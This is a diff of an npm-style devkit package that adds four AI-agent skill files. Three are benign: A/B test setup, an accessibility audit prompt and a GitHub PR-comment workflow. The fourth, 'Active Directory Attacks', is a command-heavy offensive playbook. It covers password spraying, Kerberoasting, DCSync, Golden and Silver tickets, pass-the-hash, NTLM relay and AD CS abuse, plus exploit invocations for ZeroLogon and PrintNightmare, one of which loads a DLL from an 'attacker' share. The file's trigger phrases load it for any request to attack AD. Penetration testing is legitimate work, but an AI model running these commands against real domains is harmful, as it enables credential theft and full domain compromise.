@ngxtm/devkit 3.6.1 → 3.8.0

package/merged-commands/ab-test-setup.md

@@ -0,0 +1,232 @@
+---
+name: ab-test-setup
+description: Structured guide for setting up A/B tests with mandatory gates for hypothesis, metrics, and execution readiness.
+---
+
+# A/B Test Setup
+
+## 1️⃣ Purpose & Scope
+
+Ensure every A/B test is **valid, rigorous, and safe** before a single line of code is written.
+
+- Prevents "peeking"
+- Enforces statistical power
+- Blocks invalid hypotheses
+
+---
+
+## 2️⃣ Pre-Requisites
+
+You must have:
+
+- A clear user problem
+- Access to an analytics source
+- Roughly estimated traffic volume
+
+### Hypothesis Quality Checklist
+
+A valid hypothesis includes:
+
+- Observation or evidence
+- Single, specific change
+- Directional expectation
+- Defined audience
+- Measurable success criteria
+
+---
+
+### 3️⃣ Hypothesis Lock (Hard Gate)
+
+Before designing variants or metrics, you MUST:
+
+- Present the **final hypothesis**
+- Specify:
+  - Target audience
+  - Primary metric
+  - Expected direction of effect
+  - Minimum Detectable Effect (MDE)
+
+Ask explicitly:
+
+> “Is this the final hypothesis we are committing to for this test?”
+
+**Do NOT proceed until confirmed.**
+
+---
+
+### 4️⃣ Assumptions & Validity Check (Mandatory)
+
+Explicitly list assumptions about:
+
+- Traffic stability
+- User independence
+- Metric reliability
+- Randomization quality
+- External factors (seasonality, campaigns, releases)
+
+If assumptions are weak or violated:
+
+- Warn the user
+- Recommend delaying or redesigning the test
+
+---
+
+### 5️⃣ Test Type Selection
+
+Choose the simplest valid test:
+
+- **A/B Test** – single change, two variants
+- **A/B/n Test** – multiple variants, higher traffic required
+- **Multivariate Test (MVT)** – interaction effects, very high traffic
+- **Split URL Test** – major structural changes
+
+Default to **A/B** unless there is a clear reason otherwise.
+
+---
+
+### 6️⃣ Metrics Definition
+
+#### Primary Metric (Mandatory)
+
+- Single metric used to evaluate success
+- Directly tied to the hypothesis
+- Pre-defined and frozen before launch
+
+#### Secondary Metrics
+
+- Provide context
+- Explain _why_ results occurred
+- Must not override the primary metric
+
+#### Guardrail Metrics
+
+- Metrics that must not degrade
+- Used to prevent harmful wins
+- Trigger test stop if significantly negative
+
+---
+
+### 7️⃣ Sample Size & Duration
+
+Define upfront:
+
+- Baseline rate
+- MDE
+- Significance level (typically 95%)
+- Statistical power (typically 80%)
+
+Estimate:
+
+- Required sample size per variant
+- Expected test duration
+
+**Do NOT proceed without a realistic sample size estimate.**
+
+---
+
+### 8️⃣ Execution Readiness Gate (Hard Stop)
+
+You may proceed to implementation **only if all are true**:
+
+- Hypothesis is locked
+- Primary metric is frozen
+- Sample size is calculated
+- Test duration is defined
+- Guardrails are set
+- Tracking is verified
+
+If any item is missing, stop and resolve it.
+
+---
+
+## Running the Test
+
+### During the Test
+
+**DO:**
+
+- Monitor technical health
+- Document external factors
+
+**DO NOT:**
+
+- Stop early due to “good-looking” results
+- Change variants mid-test
+- Add new traffic sources
+- Redefine success criteria
+
+---
+
+## Analyzing Results
+
+### Analysis Discipline
+
+When interpreting results:
+
+- Do NOT generalize beyond the tested population
+- Do NOT claim causality beyond the tested change
+- Do NOT override guardrail failures
+- Separate statistical significance from business judgment
+
+### Interpretation Outcomes
+
+| Result               | Action                                 |
+| -------------------- | -------------------------------------- |
+| Significant positive | Consider rollout                       |
+| Significant negative | Reject variant, document learning      |
+| Inconclusive         | Consider more traffic or bolder change |
+| Guardrail failure    | Do not ship, even if primary wins      |
+
+---
+
+## Documentation & Learning
+
+### Test Record (Mandatory)
+
+Document:
+
+- Hypothesis
+- Variants
+- Metrics
+- Sample size vs achieved
+- Results
+- Decision
+- Learnings
+- Follow-up ideas
+
+Store records in a shared, searchable location to avoid repeated failures.
+
+---
+
+## Refusal Conditions (Safety)
+
+Refuse to proceed if:
+
+- Baseline rate is unknown and cannot be estimated
+- Traffic is insufficient to detect the MDE
+- Primary metric is undefined
+- Multiple variables are changed without proper design
+- Hypothesis cannot be clearly stated
+
+Explain why and recommend next steps.
+
+---
+
+## Key Principles (Non-Negotiable)
+
+- One hypothesis per test
+- One primary metric
+- Commit before launch
+- No peeking
+- Learning over winning
+- Statistical rigor first
+
+---
+
+## Final Reminder
+
+A/B testing is not about proving ideas right.
+It is about **learning the truth with confidence**.
+
+If you feel tempted to rush, simplify, or “just try it” —
+that is the signal to **slow down and re-check the design**.

package/merged-commands/accessibility-compliance-accessibility-audit.md

@@ -0,0 +1,42 @@
+---
+name: accessibility-compliance-accessibility-audit
+description: "You are an accessibility expert specializing in WCAG compliance, inclusive design, and assistive technology compatibility. Conduct audits, identify barriers, and provide remediation guidance."
+---
+
+# Accessibility Audit and Testing
+
+You are an accessibility expert specializing in WCAG compliance, inclusive design, and assistive technology compatibility. Conduct comprehensive audits, identify barriers, provide remediation guidance, and ensure digital products are accessible to all users.
+
+## Use this skill when
+
+- Auditing web or mobile experiences for WCAG compliance
+- Identifying accessibility barriers and remediation priorities
+- Establishing ongoing accessibility testing practices
+- Preparing compliance evidence for stakeholders
+
+## Do not use this skill when
+
+- You only need a general UI design review without accessibility scope
+- The request is unrelated to user experience or compliance
+- You cannot access the UI, design artifacts, or content
+
+## Context
+
+The user needs to audit and improve accessibility to ensure compliance with WCAG standards and provide an inclusive experience for users with disabilities. Focus on automated testing, manual verification, remediation strategies, and establishing ongoing accessibility practices.
+
+## Requirements
+
+$ARGUMENTS
+
+## Instructions
+
+- Confirm scope (platforms, WCAG level, target pages, key user journeys).
+- Run automated scans to collect baseline violations and coverage gaps.
+- Perform manual checks (keyboard, screen reader, focus order, contrast).
+- Map findings to WCAG criteria, severity, and user impact.
+- Provide remediation steps and re-test after fixes.
+- If detailed procedures are required, open `resources/implementation-playbook.md`.
+
+## Resources
+
+- `resources/implementation-playbook.md` for detailed audit steps, tooling, and remediation examples.

package/merged-commands/active-directory-attacks.md

@@ -0,0 +1,383 @@
+---
+name: Active Directory Attacks
+description: This skill should be used when the user asks to "attack Active Directory", "exploit AD", "Kerberoasting", "DCSync", "pass-the-hash", "BloodHound enumeration", "Golden Ticket", "Silver Ticket", "AS-REP roasting", "NTLM relay", or needs guidance on Windows domain penetration testing.
+metadata:
+  author: zebbern
+  version: "1.1"
+---
+
+# Active Directory Attacks
+
+## Purpose
+
+Provide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing.
+
+## Inputs/Prerequisites
+
+- Kali Linux or Windows attack platform
+- Domain user credentials (for most attacks)
+- Network access to Domain Controller
+- Tools: Impacket, Mimikatz, BloodHound, Rubeus, CrackMapExec
+
+## Outputs/Deliverables
+
+- Domain enumeration data
+- Extracted credentials and hashes
+- Kerberos tickets for impersonation
+- Domain Administrator access
+- Persistent access mechanisms
+
+---
+
+## Essential Tools
+
+| Tool | Purpose |
+|------|---------|
+| BloodHound | AD attack path visualization |
+| Impacket | Python AD attack tools |
+| Mimikatz | Credential extraction |
+| Rubeus | Kerberos attacks |
+| CrackMapExec | Network exploitation |
+| PowerView | AD enumeration |
+| Responder | LLMNR/NBT-NS poisoning |
+
+---
+
+## Core Workflow
+
+### Step 1: Kerberos Clock Sync
+
+Kerberos requires clock synchronization (±5 minutes):
+
+```bash
+# Detect clock skew
+nmap -sT 10.10.10.10 -p445 --script smb2-time
+
+# Fix clock on Linux
+sudo date -s "14 APR 2024 18:25:16"
+
+# Fix clock on Windows
+net time /domain /set
+
+# Fake clock without changing system time
+faketime -f '+8h' <command>
+```
+
+### Step 2: AD Reconnaissance with BloodHound
+
+```bash
+# Start BloodHound
+neo4j console
+bloodhound --no-sandbox
+
+# Collect data with SharpHound
+.\SharpHound.exe -c All
+.\SharpHound.exe -c All --ldapusername user --ldappassword pass
+
+# Python collector (from Linux)
+bloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.10 -c all
+```
+
+### Step 3: PowerView Enumeration
+
+```powershell
+# Get domain info
+Get-NetDomain
+Get-DomainSID
+Get-NetDomainController
+
+# Enumerate users
+Get-NetUser
+Get-NetUser -SamAccountName targetuser
+Get-UserProperty -Properties pwdlastset
+
+# Enumerate groups
+Get-NetGroupMember -GroupName "Domain Admins"
+Get-DomainGroup -Identity "Domain Admins" | Select-Object -ExpandProperty Member
+
+# Find local admin access
+Find-LocalAdminAccess -Verbose
+
+# User hunting
+Invoke-UserHunter
+Invoke-UserHunter -Stealth
+```
+
+---
+
+## Credential Attacks
+
+### Password Spraying
+
+```bash
+# Using kerbrute
+./kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt Password123
+
+# Using CrackMapExec
+crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123' --continue-on-success
+```
+
+### Kerberoasting
+
+Extract service account TGS tickets and crack offline:
+
+```bash
+# Impacket
+GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt
+
+# Rubeus
+.\Rubeus.exe kerberoast /outfile:hashes.txt
+
+# CrackMapExec
+crackmapexec ldap 10.10.10.10 -u user -p password --kerberoast output.txt
+
+# Crack with hashcat
+hashcat -m 13100 hashes.txt rockyou.txt
+```
+
+### AS-REP Roasting
+
+Target accounts with "Do not require Kerberos preauthentication":
+
+```bash
+# Impacket
+GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat
+
+# Rubeus
+.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
+
+# Crack with hashcat
+hashcat -m 18200 hashes.txt rockyou.txt
+```
+
+### DCSync Attack
+
+Extract credentials directly from DC (requires Replicating Directory Changes rights):
+
+```bash
+# Impacket
+secretsdump.py domain.local/admin:password@10.10.10.10 -just-dc-user krbtgt
+
+# Mimikatz
+lsadump::dcsync /domain:domain.local /user:krbtgt
+lsadump::dcsync /domain:domain.local /user:Administrator
+```
+
+---
+
+## Kerberos Ticket Attacks
+
+### Pass-the-Ticket (Golden Ticket)
+
+Forge TGT with krbtgt hash for any user:
+
+```powershell
+# Get krbtgt hash via DCSync first
+# Mimikatz - Create Golden Ticket
+kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /id:500 /ptt
+
+# Impacket
+ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain domain.local Administrator
+export KRB5CCNAME=Administrator.ccache
+psexec.py -k -no-pass domain.local/Administrator@dc.domain.local
+```
+
+### Silver Ticket
+
+Forge TGS for specific service:
+
+```powershell
+# Mimikatz
+kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /target:server.domain.local /service:cifs /rc4:SERVICE_HASH /ptt
+```
+
+### Pass-the-Hash
+
+```bash
+# Impacket
+psexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
+wmiexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
+smbexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
+
+# CrackMapExec
+crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH -d domain.local
+crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH --local-auth
+```
+
+### OverPass-the-Hash
+
+Convert NTLM hash to Kerberos ticket:
+
+```bash
+# Impacket
+getTGT.py domain.local/user -hashes :NTHASH
+export KRB5CCNAME=user.ccache
+
+# Rubeus
+.\Rubeus.exe asktgt /user:user /rc4:NTHASH /ptt
+```
+
+---
+
+## NTLM Relay Attacks
+
+### Responder + ntlmrelayx
+
+```bash
+# Start Responder (disable SMB/HTTP for relay)
+responder -I eth0 -wrf
+
+# Start relay
+ntlmrelayx.py -tf targets.txt -smb2support
+
+# LDAP relay for delegation attack
+ntlmrelayx.py -t ldaps://dc.domain.local -wh attacker-wpad --delegate-access
+```
+
+### SMB Signing Check
+
+```bash
+crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt
+```
+
+---
+
+## Certificate Services Attacks (AD CS)
+
+### ESC1 - Misconfigured Templates
+
+```bash
+# Find vulnerable templates
+certipy find -u user@domain.local -p password -dc-ip 10.10.10.10
+
+# Exploit ESC1
+certipy req -u user@domain.local -p password -ca CA-NAME -target dc.domain.local -template VulnTemplate -upn administrator@domain.local
+
+# Authenticate with certificate
+certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
+```
+
+### ESC8 - Web Enrollment Relay
+
+```bash
+ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
+```
+
+---
+
+## Critical CVEs
+
+### ZeroLogon (CVE-2020-1472)
+
+```bash
+# Check vulnerability
+crackmapexec smb 10.10.10.10 -u '' -p '' -M zerologon
+
+# Exploit
+python3 cve-2020-1472-exploit.py DC01 10.10.10.10
+
+# Extract hashes
+secretsdump.py -just-dc domain.local/DC01\$@10.10.10.10 -no-pass
+
+# Restore password (important!)
+python3 restorepassword.py domain.local/DC01@DC01 -target-ip 10.10.10.10 -hexpass HEXPASSWORD
+```
+
+### PrintNightmare (CVE-2021-1675)
+
+```bash
+# Check for vulnerability
+rpcdump.py @10.10.10.10 | grep 'MS-RPRN'
+
+# Exploit (requires hosting malicious DLL)
+python3 CVE-2021-1675.py domain.local/user:pass@10.10.10.10 '\\attacker\share\evil.dll'
+```
+
+### samAccountName Spoofing (CVE-2021-42278/42287)
+
+```bash
+# Automated exploitation
+python3 sam_the_admin.py "domain.local/user:password" -dc-ip 10.10.10.10 -shell
+```
+
+---
+
+## Quick Reference
+
+| Attack | Tool | Command |
+|--------|------|---------|
+| Kerberoast | Impacket | `GetUserSPNs.py domain/user:pass -request` |
+| AS-REP Roast | Impacket | `GetNPUsers.py domain/ -usersfile users.txt` |
+| DCSync | secretsdump | `secretsdump.py domain/admin:pass@DC` |
+| Pass-the-Hash | psexec | `psexec.py domain/user@target -hashes :HASH` |
+| Golden Ticket | Mimikatz | `kerberos::golden /user:Admin /krbtgt:HASH` |
+| Spray | kerbrute | `kerbrute passwordspray -d domain users.txt Pass` |
+
+---
+
+## Constraints
+
+**Must:**
+- Synchronize time with DC before Kerberos attacks
+- Have valid domain credentials for most attacks
+- Document all compromised accounts
+
+**Must Not:**
+- Lock out accounts with excessive password spraying
+- Modify production AD objects without approval
+- Leave Golden Tickets without documentation
+
+**Should:**
+- Run BloodHound for attack path discovery
+- Check for SMB signing before relay attacks
+- Verify patch levels for CVE exploitation
+
+---
+
+## Examples
+
+### Example 1: Domain Compromise via Kerberoasting
+
+```bash
+# 1. Find service accounts with SPNs
+GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10
+
+# 2. Request TGS tickets
+GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10 -request -outputfile tgs.txt
+
+# 3. Crack tickets
+hashcat -m 13100 tgs.txt rockyou.txt
+
+# 4. Use cracked service account
+psexec.py domain.local/svc_admin:CrackedPassword@10.10.10.10
+```
+
+### Example 2: NTLM Relay to LDAP
+
+```bash
+# 1. Start relay targeting LDAP
+ntlmrelayx.py -t ldaps://dc.domain.local --delegate-access
+
+# 2. Trigger authentication (e.g., via PrinterBug)
+python3 printerbug.py domain.local/user:pass@target 10.10.10.12
+
+# 3. Use created machine account for RBCD attack
+```
+
+---
+
+## Troubleshooting
+
+| Issue | Solution |
+|-------|----------|
+| Clock skew too great | Sync time with DC or use faketime |
+| Kerberoasting returns empty | No service accounts with SPNs |
+| DCSync access denied | Need Replicating Directory Changes rights |
+| NTLM relay fails | Check SMB signing, try LDAP target |
+| BloodHound empty | Verify collector ran with correct creds |
+
+---
+
+## Additional Resources
+
+For advanced techniques including delegation attacks, GPO abuse, RODC attacks, SCCM/WSUS deployment, ADCS exploitation, trust relationships, and Linux AD integration, see [references/advanced-attacks.md](references/advanced-attacks.md).

package/merged-commands/address-github-comments.md

@@ -0,0 +1,55 @@
+---
+name: address-github-comments
+description: Use when you need to address review or issue comments on an open GitHub Pull Request using the gh CLI.
+---
+
+# Address GitHub Comments
+
+## Overview
+
+Efficiently address PR review comments or issue feedback using the GitHub CLI (`gh`). This skill ensures all feedback is addressed systematically.
+
+## Prerequisites
+
+Ensure `gh` is authenticated.
+
+```bash
+gh auth status
+```
+
+If not logged in, run `gh auth login`.
+
+## Workflow
+
+### 1. Inspect Comments
+
+Fetch the comments for the current branch's PR.
+
+```bash
+gh pr view --comments
+```
+
+Or use a custom script if available to list threads.
+
+### 2. Categorize and Plan
+
+- List the comments and review threads.
+- Propose a fix for each.
+- **Wait for user confirmation** on which comments to address first if there are many.
+
+### 3. Apply Fixes
+
+Apply the code changes for the selected comments.
+
+### 4. Respond to Comments
+
+Once fixed, respond to the threads as resolved.
+
+```bash
+gh pr comment <PR_NUMBER> --body "Addressed in latest commit."
+```
+
+## Common Mistakes
+
+- **Applying fixes without understanding context**: Always read the surrounding code of a comment.
+- **Not verifying auth**: Check `gh auth status` before starting.